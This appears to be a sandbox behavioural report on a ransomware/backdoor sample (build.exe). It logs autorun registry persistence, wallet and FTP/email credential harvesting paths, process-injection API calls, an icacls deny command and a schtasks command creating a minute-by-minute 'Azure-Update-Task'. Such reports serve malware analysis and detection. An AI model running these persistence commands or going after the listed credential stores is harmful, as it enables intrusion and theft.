HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper

reg_value

"C:\Users\test22\AppData\Local\0a5dcf08-f922-476c-b2eb-e95d83fc661d\build.exe" --AutoStart

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets\

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Executes one or more WMI queries (2 events)

wmi
wmi	Select * From AntiVirusProductroot\SecurityCente

Potential code injection by writing to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory May 18, 2023, 9:33 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2052 process_handle: 0x00000080	1	1
WriteProcessMemory May 18, 2023, 9:33 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2332 process_handle: 0x00000080	1	1
WriteProcessMemory May 18, 2023, 9:33 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2760 process_handle: 0x00000080	1	1

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExA May 18, 2023, 9:33 a.m.	key_handle: 0x0000058c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (1 event)

file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (3 events)

process	build.exe	useragent	Microsoft Internet Explorer
process	build2.exe	useragent	Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
process	build2.exe	useragent	Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko) (Debian)

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 884 called NtSetContextThread to modify thread in remote process 2052
Process injection	Process 2252 called NtSetContextThread to modify thread in remote process 2332
Process injection	Process 2500 called NtSetContextThread to modify thread in remote process 2760
NtSetContextThread May 18, 2023, 9:33 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2052	1	0	0
NtSetContextThread May 18, 2023, 9:33 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2332	1	0	0
NtSetContextThread May 18, 2023, 9:33 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4377661 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2760	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 884 resumed a thread in remote process 2052
Process injection	Process 2052 resumed a thread in remote process 2252
Process injection	Process 2252 resumed a thread in remote process 2332
Process injection	Process 2500 resumed a thread in remote process 2760
NtResumeThread May 18, 2023, 9:33 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2052	1	0	0
NtResumeThread May 18, 2023, 9:33 a.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 2252	1	0	0
NtResumeThread May 18, 2023, 9:33 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2332	1	0	0
NtResumeThread May 18, 2023, 9:33 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2760	1	0	0

Uses suspicious command line tools or Windows utilities (1 event)

cmdline

icacls "C:\Users\test22\AppData\Local\0a5dcf08-f922-476c-b2eb-e95d83fc661d" /deny *S-1-1-0:(OI)(CI)(DE,DC)

File has been identified by 22 AntiVirus engines on VirusTotal as malicious (22 events)

Bkav	W32.AIDetectMalware
FireEye	Generic.mg.c82632236e77359b
CAT-QuickHeal	Ransom.Stop.P5
Sangfor	Trojan.Win32.Save.a
Cybereason	malicious.44ef68
Symantec	Packed.Generic.528
Elastic	malicious (high confidence)
APEX	Malicious
Kaspersky	VHO:Backdoor.Win32.Mokes.gen
McAfee-GW-Edition	BehavesLike.Win32.Lockbit.bc
Trapmine	malicious.high.ml.score
Sophos	ML/PE-A
Ikarus	Trojan-Ransom.StopCrypt
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	VHO:Backdoor.Win32.Mokes.gen
Cynet	Malicious (score: 100)
Cylance	unsafe
Rising	Trojan.Generic@AI.100 (RDML:lB0mnTjFDtn1t4+O50PDZw)
SentinelOne	Static AI - Suspicious PE
MaxSecure	Trojan.Malware.300983.susgen
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_100% (D)

Executed a process and injected code into it, probably while unpacking (27 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW May 18, 2023, 9:33 a.m.	thread_identifier: 2056 thread_handle: 0x0000007c process_identifier: 2052 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread May 18, 2023, 9:33 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection May 18, 2023, 9:33 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2052 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2052 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory May 18, 2023, 9:33 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2052 process_handle: 0x00000080	1	1
NtSetContextThread May 18, 2023, 9:33 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2052	1	0
NtResumeThread May 18, 2023, 9:33 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2052	1	0
CreateProcessInternalW May 18, 2023, 9:33 a.m.	thread_identifier: 2200 thread_handle: 0x00000314 process_identifier: 2196 current_directory: filepath: track: 1 command_line: icacls "C:\Users\test22\AppData\Local\0a5dcf08-f922-476c-b2eb-e95d83fc661d" /deny *S-1-1-0:(OI)(CI)(DE,DC) filepath_r: stack_pivoted: 0 creation_flags: 72 (DETACHED_PROCESS\|IDLE_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000304	1	1
CreateProcessInternalW May 18, 2023, 9:33 a.m.	thread_identifier: 2256 thread_handle: 0x000002c4 process_identifier: 2252 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002cc	1	1
NtResumeThread May 18, 2023, 9:33 a.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 2252	1	0
CreateProcessInternalW May 18, 2023, 9:33 a.m.	thread_identifier: 2336 thread_handle: 0x0000007c process_identifier: 2332 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\build.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask filepath_r: C:\Users\test22\AppData\Local\Temp\build.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread May 18, 2023, 9:33 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection May 18, 2023, 9:33 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2332 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2332 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory May 18, 2023, 9:33 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2332 process_handle: 0x00000080	1	1
NtSetContextThread May 18, 2023, 9:33 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4342081 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2332	1	0
NtResumeThread May 18, 2023, 9:33 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2332	1	0
CreateProcessInternalW May 18, 2023, 9:33 a.m.	thread_identifier: 2504 thread_handle: 0x000002c0 process_identifier: 2500 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build2.exe" filepath_r: C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build2.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b8	1	1
CreateProcessInternalW May 18, 2023, 9:33 a.m.	thread_identifier: 2556 thread_handle: 0x000004d0 process_identifier: 2552 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build3.exe track: 1 command_line: "C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build3.exe" filepath_r: C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build3.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002c8	1	1
CreateProcessInternalW May 18, 2023, 9:33 a.m.	thread_identifier: 2764 thread_handle: 0x0000007c process_identifier: 2760 current_directory: filepath: C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build2.exe track: 1 command_line: "C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build2.exe" filepath_r: C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build2.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000080	1	1
NtGetContextThread May 18, 2023, 9:33 a.m.	thread_handle: 0x0000007c	1	0
NtUnmapViewOfSection May 18, 2023, 9:33 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2760 process_handle: 0x00000080	1	0
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2760 region_size: 438272 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1	0
WriteProcessMemory May 18, 2023, 9:33 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2760 process_handle: 0x00000080	1	1
NtSetContextThread May 18, 2023, 9:33 a.m.	registers.eip: 2005598660 registers.esp: 1638384 registers.edi: 0 registers.eax: 4377661 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000007c process_identifier: 2760	1	0
NtResumeThread May 18, 2023, 9:33 a.m.	thread_handle: 0x0000007c suspend_count: 1 process_identifier: 2760	1	0
CreateProcessInternalW May 18, 2023, 9:33 a.m.	thread_identifier: 2660 thread_handle: 0x000000ac process_identifier: 2656 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1

build.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All